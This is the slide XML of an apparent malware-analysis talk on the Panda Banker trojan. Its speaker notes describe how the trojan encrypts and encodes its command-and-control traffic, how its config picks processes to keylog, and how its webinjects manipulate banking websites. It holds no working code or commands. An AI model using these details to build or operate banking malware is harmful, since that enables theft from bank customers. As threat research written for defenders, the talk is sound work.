              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This data is then encoded into alphanumeric characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And finally, random slashes are added to form the final URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348639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version 2.2.1, the algorithm was changed slightly by replacing the uppercase hex encoding with base64 and then translating some of the base64 characters.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1763033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When Panda Banker has data to send to the C2 server, it generates a random 32-byte key and a random 16-byte IV. It uses these to encrypt the data using AES256 in CBC mode.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304-byte header is prepended to the encrypted data and it includes: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32-byte placeholder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randomly generated AES key that has been RSA encrypted using the BaseConfig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randomly generated AES IV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Before being sent the 32-byte placeholder at offset 0 is replaced with a SHA256 hash. The hash is of the previously generated URI combined with the header (minus the placeholder) and the encrypted data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291950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early versions, the final POST data would look something like this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3987097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Then starting in version 2.2.1, the data was base64 encoded before being sent.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27565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some folks have found other more accessible pages like this template file that also bare its name.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3686615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To request a file from the C2 server, the request looks something like this. It uses JSON and contains some basic information in the “BotInfo” section and then the file name it is requesting in the “File” section.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I’ll talk about some of the other interesting filenames that can be requested in a few slides, but the first filename requested comes from the C2 URLs stored in the BaseConfig that I mentioned a few slides ago.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2745954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Beneath the TLS, a C2 response looks something like this. The response data is encrypted using a number of layers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694628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early versions of Panda Banker, the first layer of encrypted data was a 40-byte header followed by AES encrypted data. The header contained a SHA256 hash of the rest of the data and a 16-byte IV. The key used to decrypt this layer was the same randomly generated 32-byte AES key sent along in the request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1473707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Similar to what they did for requests, in version 2.2.1, they started base64 encoding this layer as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3387759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Once the first layer is decrypted, the data contains a JSON file that looks something like this.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important part here is the “data” section which contains more encrypted data. This data can be base64 decoded and then decrypted like a BaseConfig.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3914978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Underneath the second layer is another JSON file that looks similar to the one before. In the malware, this is where the response data is cryptographically verified, but the important part for us is the “data” section again. Like before it can be base64 decoded and decrypted like a BaseConfig.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374131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first file requested from the C2 server is called the dynamic config in Zeus’ parlance. It uses JSON and looks something like this.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general the dynamic config contains modules to download and various configuration options for those modules and Panda Banker itself. Modules implement various malware functionality like keylogging, VNC, and main-in-the-browser.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When Panda Banker downloads a module or configuration file it does so via the command and control process just described. The files aren’t generally available directly at their URLs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15067921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“botnet” field in the dynamic config is similar in concept to the static botnets discussed earlier and there is quite a bit of overlap.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26977250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“keylog_” and “screen_process” options specify which processes should be keylogged and/or screenshotted. These values are base64 encoded in the dynamic config and contain process names. So far, I’ve seen about 168 unique process names…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27033504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One of the modules that Panda Banker downloads and installs allows the malware to perform what is known as a man-in-the-browser attack.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general this is a mechanism that banking malware use to hijack a victim’s web browser and control what is sent, received, and displayed.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 usually does this in conjunction with what are known as “webinjects” which can be thought of as rules that specify what financial institution websites to target and how.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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1909372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name that Panda Banker is known by is “Zeus Panda” and that’s because Panda Banker is based off the infamous Zeus banking trojan source code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4998779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Once downloaded and decrypted, Panda Banker’s webinjects require a little bit of formatting to be human readable. Like the dynamic config, the webinjects are delivered as JSON and there are a number of base64 encoded sections.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32008527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“webfilters” section contains a NULL delimited list of websites that when visited by an infected web browser a certain action takes place.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Actions are denoted by the first character of a list entry and can be things like: block access, take a screenshot, start taking a video capture of the screen, don’t log anything, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30362560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“webinjects” section contains an array of binary structures where each entry specifies a particular webinject target. This is where the URL of the targeted financial institution is usually found. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23647629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Each of the target entries corresponds to one of the “webinjectdata” sections. These sections contain an array of structures where each entry describes a piece of the webinject. Each piece can specify where or how a targeted financial website should be manipulated and generally consists of  HTML and/or JavaScript. The overall functionality of a  webinject tends to be built up over multiple pieces.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13729478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Putting everything together we can parse together the webinjects into something more human readable. In homage, I’ve made them similar in style to the format that most Zeus variants use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41712223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a quick aside, as you probably noticed, Panda Banker uses a lot of JSON in its command and control protocol. This is quite a departure from Zeus and most of the other variants which tend to uses a custom binary data structure called BinStorage. There has been plenty written about BinStorage already, so I’m not going to get into, I just wanted to point out the difference.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36420325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 far, for Panda Banker, I’ve seen about 1400 unique webinject target URLs. These targets have been distributed across 30 countries--with the US, Italy, Australia, Canada, and the UK being the top 5.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21598991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 try to group webinjects into 3 broad types: default/test webinjects, kits, and then other. Here’s a sample distribution grouped over the first 2.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21120254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Default and test webinjects are pretty much what you think they are. These are the 3 I typically see with Panda Banker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3107345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Webinjects in general have been commoditized and there are threat actors out there who specialize in creating them, packaging them up into kits, and selling them to other threat actors who use them with their banking malware.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Panda Banker, the most popular webinject kit is called “Tables”. It can be identified in a webinject by looking for a ”brows.inject” snippet and its has a nice self-identifying panel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
